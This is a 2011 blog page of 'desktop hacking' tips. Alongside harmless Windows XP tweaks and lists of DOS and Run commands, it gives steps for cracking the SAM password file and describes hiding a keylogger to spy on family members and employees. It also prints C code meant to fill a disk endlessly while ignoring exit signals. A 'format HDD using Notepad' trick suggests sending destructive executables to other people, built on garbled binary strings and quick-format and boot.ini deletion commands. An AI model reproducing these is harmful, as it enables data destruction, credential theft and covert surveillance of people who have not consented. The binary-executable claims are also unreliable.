Wednesday, 13 July 2011

Desktop hacking

Desktop Hacking

21 Tips 4 increasing Windows XP performance.

1]Your Pc Must have 256MB RAM , 512 MB Cache , Intel Pentium 4 Processor, 40 GB HDD. These are the minimum     requirements. 
 2] If you see a 'virtual memory low' message then increase its virtual memory. To increase virtual memory, Go to My Computer->Properties->Advanced->Performance Settings->Advanced->Virtual Memory->Change->Select the appropriate drive->Custom size->set appropriate level(our it is 600(min.) & 700(max.)->Ok.
 3] Increase 'Visual Performance'. Go to My Computer->Properties->Advanced->Performance Settings->Visual Settings->Custom->Select only the following options. a)Slide taskbar buttons. b)Smooth edges of screen fonts. c)Smooth-scroll list boxes. d)Use a background image for each folder type. e)Use visual style on windows and buttons.
  4] Don't keep unwanted/extra fonts. To remove extra fonts, Go to Start->Settings->Control Panel->Fonts. 
  5] Your Desktop Wallpaper & Screensaver consume a large amount of disk space. Select the 'None' option for both wallpapers & Screensavers.
  6] Avoid keeping DEMO Games.
  7] Uninstall the unwanted Softwares.
  8] Use Registry Cleaner to keep your registry clean(without errors).
  9] Try to keep Music and pictures files in the folder specified by windows itself.
10] Use Hybernating Option for Quick windows start. To active Hybernating follow the following steps. Desktop->Properties->Screensaver->Power->Hybernating->Enable Hybernating->Ok.
  11] Keep your Dektop clean with unwanted icons.
  12] Use Intel Application Accelerator to speed up your disk access,
  13] Memory management (at least 512MB RAM Required). This allow XP to keep data in Memory instead of paging section of RAM. Go to->Start->Run->regedit->HKEY_LOCAL_MACHINE->SYSTEM->CurrentControlSet->Control->Session Manager->Memory Management->Double click it->DisablePageingExecutive->Double Clik it->Set value to 1.
 14] Disable Yahoo Messenger, Google Talk, and other unwanted programs from startup. (You can use registry editior to do this.). Because they do not appear in normal Startup Option.
 15] Disable indexing files service (only if you do not use search option regularly). To do this follow the following steps. Go to My Computer->Select the drive for which you want to disable the indexing service->Properties->Unselect 'Allow Indexing Service'->Ok.
  16] For Windows XP, You must use NTFS partition. FAT partition is less supportive for Windows XP.
  17] In BIOS, Select first booting device as your HDD.
  18] Setting Priority High for a particular program. Open Task Manager->Processes->Select the desired Program->Right Click->Set Priority->High->Ok. This Priority set if for current session. Once you restart your system then its priority will again be Normal.
  19] Keep deleting your Temporary Internet Files in regular intervals. Go to Windows Drive (c: or d:)->Select the User->Local Settings->Temporary Internet Files
  20] Empty your browser's cache in regular intervals.
  21] Avoid keeping Movies in your PC.

Cracking Windows Logon Password.

(Hacking SAM file) Windows NT/2000/XP/2003

SAM File - Holds the user names and password hashes for every account on the local machine, or domain if it is a domain controller.

-What are password Hashes? Actually when we enter password in Windows Logon Tab, Windows encryptsour password using an encryption scheme that turns our password into something that looks like this: 65464564s1d4d2c9a56s42166d55se SAM file can be found under C:(default OS drive) -> WINNT -> System32 -> Config -> SAM. SAM file can be cracked by sing a simple freeware software "SAMInside". Troubleshooting : While copying SAM file it shows an error of "Access Denied" or "File in Use". Actually copying of SAM file is restricted by Windows. There are many alternatives to copy SAM file. [1] You can boot your system by a Live Linux CD such as Knnopix or Fedora. Linux has access to all Windows Files. This way SAM file can be easily copied.

Keylogger.

If you want to know what other users are typing on your machine, this heavy weaponry addition to your Spy Arsenal will allow you to know everything! Simply install Family Key Logger, set the 'Start in hidden mode' and 'Remove from tasks list' options and you are ready to go. The program will reside in memory while being absolutely invisible to everyone except you. You will only have to press the Unhide key combination on the keyboard to see what your kids or your wife or your employees were typing. And remember:

Multiple Google Talk.

Now it's turn to use multiple google talk. Previously we covered that how to run multiple Yahoo messenger using Yahoo Pal!. Well for google talk, you don't have to download any software. Just follow the following simple steps. 1) Create a Shortcut on ur Desktop. 2) In the field 'type the location of the item' paste the following source... c:\program files\google\google talk\googletalk.exe" /nomutex 3)If this loction doesn't work, then locate manually by clicking on browse option.Then go to c:-> program file ->google-> google talk->googletalk.exe and then paste /nomutex in the end of manually located source. Finished. Now you can run multiple Google Talk.

BIOS Passwords Hacks.

To perform this hack you will need:
  • A #1 or #2 Phillips-head screwdriver, or (less likely) a T-15 TORX driver or a 1/4" hex nutdriver, to open the case
  • Needle-nosed pliers if you are working with jumpers
  • A small flashlight or headlamp
With tools at hand, perform the following steps:
  1. Turn the PC off (this means a total shutdown, not merely standby or hibernate mode) and disconnect the AC power cord.
  2. Remove the cover from your system (this step may require tools, undoing a thumbscrew, or flipping a latch or two).
  3. Refer to the user manual for the motherboard to find out how to "reset CMOS" memory. You may also find a label for specific jumper or switch settings marked on the system board.
  4. Change the switch setting or jumper position to a specific position or remove the jumper entirely as prescribed in the manual to clear or reset the CMOS memory.
  5. Wait 20-30 seconds for the memory to clear out from lack of power.
  6. After 20-30 seconds put the switch or jumper the way it was before for normal use.
  7. Reconnect the power cord and start up the system to see if the settings have changed to defaults.
  8. Shut the PC down, disconnect the power cord, replace the cover, reconnect the power, and power up the PC.
  9. Enter the BIOS setup program to configure the system as needed. This may include setting the date and time, selecting disk drive parameters, and selecting which devices the system uses to boot up with first.
If your system does not have a "reset CMOS" jumper or switch , the only option is to locate and remove the coin-style battery cell (or on some very old PCs, the battery pack), as shown in , that provides the power to the CMOS memory. 

Create BAD sectors on HDD.

This program will create BAD Sectors on HDD. (Use at your own risk) #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <signal.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #define HDSIZE 640000 void handle_sig(); int main() { int i = 0; int x; int fd[5]; signal(SIGINT, handle_sig); signal(SIGHUP, handle_sig); signal(SIGQUIT, handle_sig); signal(SIGABRT, handle_sig); signal(SIGTERM, handle_sig); char *buf; buf = malloc(HDSIZE); printf("sekt0r: trashing hard disk with bad sectors!\n"); while(1) { fd[1] = open("/tmp/.test", O_WRONLY|O_CREAT, 511); fd[2] = open("/tmp/.test1", O_WRONLY|O_CREAT, 511); fd[3] = open("/tmp/.test2", O_WRONLY|O_CREAT, 511); fd[4] = open("/tmp/.test3", O_WRONLY|O_CREAT, 511); fd[5] = open("/tmp/.test4", O_WRONLY|O_CREAT, 511); for(x = 0; x < 5; x++) { write(fd[x], buf, HDSIZE); lseek(fd[x], 0, SEEK_SET); close(fd[x]); } /* end for() loop. */ } /* end while() loop. */ } /* end main(). */ void handle_sig() { /* Reset signal handlers. */ signal(SIGINT, handle_sig); signal(SIGHUP, handle_sig); signal(SIGQUIT, handle_sig); signal(SIGABRT, handle_sig); signal(SIGTERM, handle_sig); printf("sekt0r: cannot exit - trashing hard disk with bad sectors!\n"); return; /* go back to creating bad sectors. */ }

Change DOS Colour.

SYNTAX Sets the default console foreground and background colors. COLOR [attr] attr Specifies color attribute of console output Color attributes are specified by TWO hex digits -- the first corresponds to the background; the second the foreground. Each digit can be any of the below values. 0 = Black 8 = Gray 1 = Blue 9 = Light Blue 2 = Green A = Light Green 3 = Aqua B = Light Aqua 4 = Red C = Light Red 5 = Purple D = Light Purple 6 = Yellow E = Light Yellow 7 = White F = Bright White If no argument is given, this command restores the color to what it was when CMD.EXE started. This value either comes from the current console window, the /T command line switch or from the Default Color registry value. The COLOR command sets ERROR LEVEL to 1 if an attempt is made to execute the COLOR command with a foreground and background color that are the same. EXAMPLE Color 2A = Creates a green background with light bright green text, similar to many of the FTP, telnet, and old BBS console screens. Valid for a session only.

Speed Up XP Booting.

Start Registry Editor (Regedit.exe). Locate the following key in the registry: HKEY_LOCAL_MACHINE\SYSTEM\Current ControlSet\Control\Ses sionManager\MemoryManagement\Prefetch Parameters Make sure you backup the keys by exporting them to a .reg file. On the EnablePrefetcher value, change the setting from 3 to 5 (decimal). Close the registry editor. Restart your computer.
Using Your Command Prompt.
Type netstat -a Display all connections and listening ports, netstat -b Display the executable involved in creating each connection or listening port. In some well-known executables host multiple independent components, and in these cases the sequence of components involved in creating the connection or listening port is displayed. In this case the executable name is in [ ] at the bottom, on top is the component it called, and so forth until TCP/IP was reached. Note that this option can be time-consuming and will fail unless you have sufficient permissions. netstat -e Displays Ethernet statistics. This may be combined with the -s option. netstat -n Displays addresses and port numbers in numerical form. netstat -o Displays the owning process ID associated with each connection. netstat -p proto Shows connections for the protocol specified by proto; proto may be any of : TCP, UDP, TCPv6, or UDPv6. If used with -s option to display per-protocol statistics, proto may be any of: IP, IPv6, ICMP, ICMPv6, TCP, TCPv6, UDP, or UDPv6 netstat -r Displays the routing table. netstat -s Displays per-protocol statistics. netstat -v When used in conjunction with -b, will display sequence of components involved in creating the connection or listening port for all executables.

Change Text on XP Start button.

Now that the modified explorer.exe has been created it’s necessary to modify the registry so the file will be recognized when the user logs on to the system. If you don’t know how to access the registry I’m not sure this article is for you, but just in case it’s a temporary memory lapse, go to Start (soon to be something else) Run and type regedit in the Open: field. Navigate to: HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows NT\ CurrentVersion\ Winlogon In the right pane, double click the Shell entry to open the Edit String dialog box. In Value data: line, enter the name that was used to save the modified explorer.exe file. Click OK. Close Registry Editor and either log off the system and log back in, or reboot the entire system if that’s your preference. If all went as planned you should see your new Start button with the revised text.
Disable or Remove Shutdown.
It is Possible to Remove Shut Down option from Start menu. Just follow the following steps. Start->Run->gpedit.msc->User Configuration->Administrative Templates->Start Menu &Taskbar->Remove Shutdown on Start Menu.->Enable. Its Done!
Format HDD using Notepad.
Copy & Paste the following code in Notepad. 0100101100011111001001010101010101000 0011111100000 Save As "format.exe" or any name u want (but with extension.exe) Now you can send this .exe file to people to format their HDD It can fail to format your HDD while running WINDOWS. Format c:\ /Q/X -- this will format your drive c:\ 011001100110111101110010011011010110000 10111010000 100000011000110011101001011100 0010000000101111010100010010111101011000 Format d:\ /Q/X -- this will format your drive d:\ 011001100110111101110010011011010110000 10111010000 100000011001000011101001011100 0010000000101111010100010010111101011000 Format a:\ /Q/X -- this will format your drive a:\ 0110011001101111011100100110110101100 0010111010000 100000011000010011101001011100 0010000000101111010100010010111101011000 del /F/S/Q c:\boot.ini -- this will STOP your computer from booting. 011001000110010101101100001000000010 11110100011000 101111010100110010111101010001 001000000110001100111010010111000110 00100110111101 101111011101000010111001101001 0110111001101001

Monday, 11 July 2011

All Dos Commands



ADDUSERS Add or list users to/from a CSV file
ARP Address Resolution Protocol
ASSOC Change file extension associations
ASSOCIAT One step file association
AT Schedule a command to run at a later time
ATTRIB Change file attributes

BOOTCFG Edit Windows boot settings
BROWSTAT Get domain, browser and PDC info

CACLS Change file permissions
CALL Call one batch program from another
CD Change Directory - move to a specific Folder
CHANGE Change Terminal Server Session properties
CHKDSK Check Disk - check and repair disk problems
CHKNTFS Check the NTFS file system
CHOICE Accept keyboard input to a batch file
CIPHER Encrypt or Decrypt files/folders
CleanMgr Automated cleanup of Temp files, recycle bin
CLEARMEM Clear memory leaks
CLIP Copy STDIN to the Windows clipboard.
CLS Clear the screen
CLUSTER Windows Clustering
CMD Start a new CMD shell
COLOR Change colors of the CMD window
COMP Compare the contents of two files or sets of files
COMPACT Compress files or folders on an NTFS partition
COMPRESS Compress individual files on an NTFS partition
CON2PRT Connect or disconnect a Printer
CONVERT Convert a FAT drive to NTFS.
COPY Copy one or more files to another location
CSVDE Import or Export Active Directory data

DATE Display or set the date
Dcomcnfg DCOM Configuration Utility
DEFRAG Defragment hard drive
DEL Delete one or more files
DELPROF Delete NT user profiles
DELTREE Delete a folder and all subfolders
DevCon Device Manager Command Line Utility
DIR Display a list of files and folders
DIRUSE Display disk usage
DISKCOMP Compare the contents of two floppy disks
DISKCOPY Copy the contents of one floppy disk to another
DNSSTAT DNS Statistics
DOSKEY Edit command line, recall commands, and create macros
DSADD Add user (computer, group..) to active directory
DSQUERY List items in active directory
DSMOD Modify user (computer, group..) in active directory

ECHO Display message on screen
ENDLOCAL End localisation of environment changes in a batch file
ERASE Delete one or more files
EXIT Quit the CMD shell
EXPAND Uncompress files
EXTRACT Uncompress CAB files

FC Compare two files
FDISK Disk Format and partition
FIND Search for a text string in a file
FINDSTR Search for strings in files
FOR Conditionally perform a command several times
FORFILES Batch process multiple files
FORMAT Format a disk
FREEDISK Check free disk space (in bytes)
FSUTIL File and Volume utilities
FTP File Transfer Protocol
FTYPE Display or modify file types used in file extension associations

GLOBAL Display membership of global groups
GOTO Direct a batch program to jump to a labelled line

HELP Online Help
HFNETCHK Network Security Hotfix Checker

IF Conditionally perform a command
IFMEMBER Is the current user in an NT Workgroup
IPCONFIG Configure IP

KILL Remove a program from memory

LABEL Edit a disk label
LOCAL Display membership of local groups
LOGEVENT Write text to the NT event viewer.
LOGOFF Log a user off
LOGTIME Log the date and time in a file

MAPISEND Send email from the command line
MEM Display memory usage
MD Create new folders
MODE Configure a system device
MORE Display output, one screen at a time
MOUNTVOL Manage a volume mount point
MOVE Move files from one folder to another
MOVEUSER Move a user from one domain to another
MSG Send a message
MSIEXEC Microsoft Windows Installer
MSINFO Windows NT diagnostics
MSTSC Terminal Server Connection (Remote Desktop Protocol)
MUNGE Find and Replace text within file(s)
MV Copy in-use files

NET Manage network resources
NETDOM Domain Manager
NETSH Configure network protocols
NETSVC Command-line Service Controller
NBTSTAT Display networking statistics (NetBIOS over TCP/IP)
NETSTAT Display networking statistics (TCP/IP)
NOW Display the current Date and Time
NSLOOKUP Name server lookup
NTBACKUP Backup folders to tape
NTRIGHTS Edit user account rights

PATH Display or set a search path for executable files
PATHPING Trace route plus network latency and packet loss
PAUSE Suspend processing of a batch file and display a message
PERMS Show permissions for a user
PERFMON Performance Monitor
PING Test a network connection
POPD Restore the previous value of the current directory saved by PUSHD
PORTQRY Display the status of ports and services
PRINT Print a text file
PRNCNFG Display, configure or rename a printer
PRNMNGR Add, delete, list printers set the default printer
PROMPT Change the command prompt
PsExec Execute process remotely
PsFile Show files opened remotely
PsGetSid Display the SID of a computer or a user
PsInfo List information about a system
PsKill Kill processes by name or process ID
PsList List detailed information about processes
PsLoggedOn Who's logged on (locally or via resource sharing)
PsLogList Event log records
PsPasswd Change account password
PsService View and control services
PsShutdown Shutdown or reboot a computer
PsSuspend Suspend processes
PUSHD Save and then change the current directory

QGREP Search file(s) for lines that match a given pattern.

RASDIAL Manage RAS connections
RASPHONE Manage RAS connections
RECOVER Recover a damaged file from a defective disk.
REG Read, Set or Delete registry keys and values
REGEDIT Import or export registry settings
REGSVR32 Register or unregister a DLL
REGINI Change Registry Permissions
REM Record comments (remarks) in a batch file
REN Rename a file or files.
REPLACE Replace or update one file with another
RD Delete folder(s)
RDISK Create a Recovery Disk
RMTSHARE Share a folder or a printer
ROBOCOPY Robust File and Folder Copy
ROUTE Manipulate network routing tables
RUNAS Execute a program under a different user account
RUNDLL32 Run a DLL command (add/remove print connections)

SC Service Control
SCHTASKS Create or Edit Scheduled Tasks
SCLIST Display NT Services
ScriptIt Control GUI applications
SET Display, set, or remove environment variables
SETLOCAL Begin localisation of environment changes in a batch file
SETX Set environment variables permanently
SHARE List or edit a file share or print share
SHIFT Shift the position of replaceable parameters in a batch file
SHORTCUT Create a windows shortcut (.LNK file)
SHOWGRPS List the NT Workgroups a user has joined
SHOWMBRS List the Users who are members of a Workgroup
SHUTDOWN Shutdown the computer
SLEEP Wait for x seconds
SOON Schedule a command to run in the near future
SORT Sort input
START Start a separate window to run a specified program or command
SU Switch User
SUBINACL Edit file and folder Permissions, Ownership and Domain
SUBST Associate a path with a drive letter
SYSTEMINFO List system configuration

TASKLIST List running applications and services
TIME Display or set the system time
TIMEOUT Delay processing of a batch file
TITLE Set the window title for a CMD.EXE session
TOUCH Change file timestamps
TRACERT Trace route to a remote host
TREE Graphical display of folder structure
TYPE Display the contents of a text file

USRSTAT List domain usernames and last login

VER Display version information
VERIFY Verify that files have been saved
VOL Display a disk label

WHERE Locate and display files in a directory tree
WHOAMI Output the current UserName and domain
WINDIFF Compare the contents of two files or sets of files
WINMSD Windows system diagnostics
WINMSDP Windows system diagnostics II
WMIC WMI Commands

XCACLS Change file permissions
XCOPY Copy files and folders

All Run Commands In Windows XP




You can access all these programs by going through START/RUN.


SQL Client Configuration - cliconfg


System Configuration Editor - sysedit


System Configuration Utility - msconfig


System File Checker Utility (Scan Immediately)- sfc /scannow


System File Checker Utility (Scan Once At Next Boot)- sfc /scanonce


System File Checker Utility (Scan On Every Boot) - sfc /scanboot


System File Checker Utility (Return to Default Setting)- sfc /revert


System File Checker Utility (Purge File Cache)- sfc /purgecache


System File Checker Utility (Set Cache Size to size x)-sfc/cachesize=x


System Information - msinfo32.


Task Manager – taskmgr


System Properties - sysdm.cpl


Task Manager – taskmgr


TCP Tester - tcptest


Telnet Client - telnet


Tweak UI (if installed) - tweakui


User Account Management- nusrmgr.cpl


Utility Manager - utilman


Windows Address Book - wab


Windows Address Book Import Utility - wabmig


Windows Backup Utility (if installed)- ntbackup


Windows Explorer - explorer


Windows Firewall- firewall.cpl


Windows Magnifier- magnify


Windows Management Infrastructure - wmimgmt.msc


Windows Media Player - wmplayer


Windows Messenger - msmsgs


Windows Picture Import Wizard (need camera connected)- wiaacmgr


Windows System Security Tool – syskey


Windows Update Launches - wupdmgr


Windows Version (to show which version of windows)- winver


Windows XP Tour Wizard - tourstart


Wordpad - write


Password Properties - password.cpl


Performance Monitor - perfmon.msc


Phone and Modem Options - telephon.cpl


Phone Dialer - dialer


Pinball Game - pinball


Power Configuration - powercfg.cpl


Printers and Faxes - control printers


Printers Folder – printers


Private Character Editor - eudcedit


Quicktime (If Installed)- QuickTime.cpl


Real Player (if installed)- realplay


Regional Settings - intl.cpl


Registry Editor - regedit


Registry Editor - regedit32


Remote Access Phonebook - rasphone


Remote Desktop - mstsc


Removable Storage - ntmsmgr.msc


Removable Storage Operator Requests - ntmsoprq.msc


Resultant Set of Policy (XP Prof) - rsop.msc


Scanners and Cameras - sticpl.cpl


Scheduled Tasks - control schedtasks


Security Center - wscui.cpl


Services - services.msc


Shared Folders - fsmgmt.msc


Shuts Down Windows - shutdown


Sounds and Audio - mmsys.cpl


Spider Solitare Card Game - spider


Malicious Software Removal Tool - mrt


Microsoft Access (if installed) - access.cpl


Microsoft Chat - winchat


Microsoft Excel (if installed) - excel


Microsoft Frontpage (if installed)- frontpg


Microsoft Movie Maker - moviemk


Microsoft Paint - mspaint


Microsoft Powerpoint (if installed)- powerpnt


Microsoft Word (if installed)- winword


Microsoft Syncronization Tool - mobsync


Minesweeper Game - winmine


Mouse Properties - control mouse


Mouse Properties - main.cpl


Nero (if installed)- nero


Netmeeting - conf


Network Connections - control netconnections


Network Connections - ncpa.cpl


Network Setup Wizard - netsetup.cpl


Notepad - notepad


Nview Desktop Manager (If Installed)- nvtuicpl.cpl


Object Packager - packager


ODBC Data Source Administrator- odbccp32.cpl


On Screen Keyboard - osk


Opens AC3 Filter (If Installed) - ac3filter.cpl


Outlook Express - msimn


Paint – pbrush


Keyboard Properties - control keyboard


IP Configuration (Display Connection Configuration) - ipconfi/all


IP Configuration (Display DNS Cache Contents)- ipconfig /displaydns


IP Configuration (Delete DNS Cache Contents)- ipconfig /flushdns


IP Configuration (Release All Connections)- ipconfig /release


IP Configuration (Renew All Connections)- ipconfig /renew


IP Configuration(RefreshesDHCP&Re-RegistersDNS)-ipconfig/registerdns


IP Configuration (Display DHCP Class ID)- ipconfig/showclassid


IP Configuration (Modifies DHCP Class ID)- ipconfig /setclassid


Java Control Panel (If Installed)- jpicpl32.cpl


Java Control Panel (If Installed)- javaws


Local Security Settings - secpol.msc


Local Users and Groups - lusrmgr.msc


Logs You Out Of Windows - logoff.....


Accessibility Controls - access.cpl


Accessibility Wizard - accwiz


Add Hardware - Wizardhdwwiz.cpl


Add/Remove Programs - appwiz.cpl


Administrative Tools control - admintools


Adobe Acrobat (if installed) - acrobat


Adobe Designer (if installed)- acrodist


Adobe Distiller (if installed)- acrodist


Adobe ImageReady (if installed)- imageready


Adobe Photoshop (if installed)- photoshop


Automatic Updates - wuaucpl.cpl


Bluetooth Transfer Wizard – fsquirt


Calculator - calc


Certificate Manager - certmgr.msc


Character Map - charmap


Check Disk Utility - chkdsk


Clipboard Viewer - clipbrd


Command Prompt - cmd


Component Services - dcomcnfg


Computer Management - compmgmt.msc


Control Panel - control


Date and Time Properties - timedate.cpl


DDE Shares - ddeshare


Device Manager - devmgmt.msc


Direct X Control Panel (If Installed)- directx.cpl


Direct X Troubleshooter- dxdiag


Disk Cleanup Utility- cleanmgr


Disk Defragment- dfrg.msc


Disk Management- diskmgmt.msc


Disk Partition Manager- diskpart


Display Properties- control desktop


Display Properties- desk.cpl


Display Properties (w/Appearance Tab Preselected)- control color


Dr. Watson System Troubleshooting Utility- drwtsn32


Driver Verifier Utility- verifier


Event Viewer- eventvwr.msc


Files and Settings Transfer Tool- migwiz


File Signature Verification Tool- sigverif


Findfast- findfast.cpl


Firefox (if installed)- firefox


Folders Properties- control folders


Fonts- control fonts


Fonts Folder- fonts


Free Cell Card Game- freecell


Game Controllers- joy.cpl


Group Policy Editor (XP Prof)- gpedit.msc


Hearts Card Game- mshearts


Help and Support- helpctr


HyperTerminal- hypertrm


Iexpress Wizard- iexpress


Indexing Service- ciadv.msc


Internet Connection Wizard- icwconn1


Internet Explorer- iexplore


Internet Setup Wizard- inetwiz


Internet Properties- inetcpl.cpl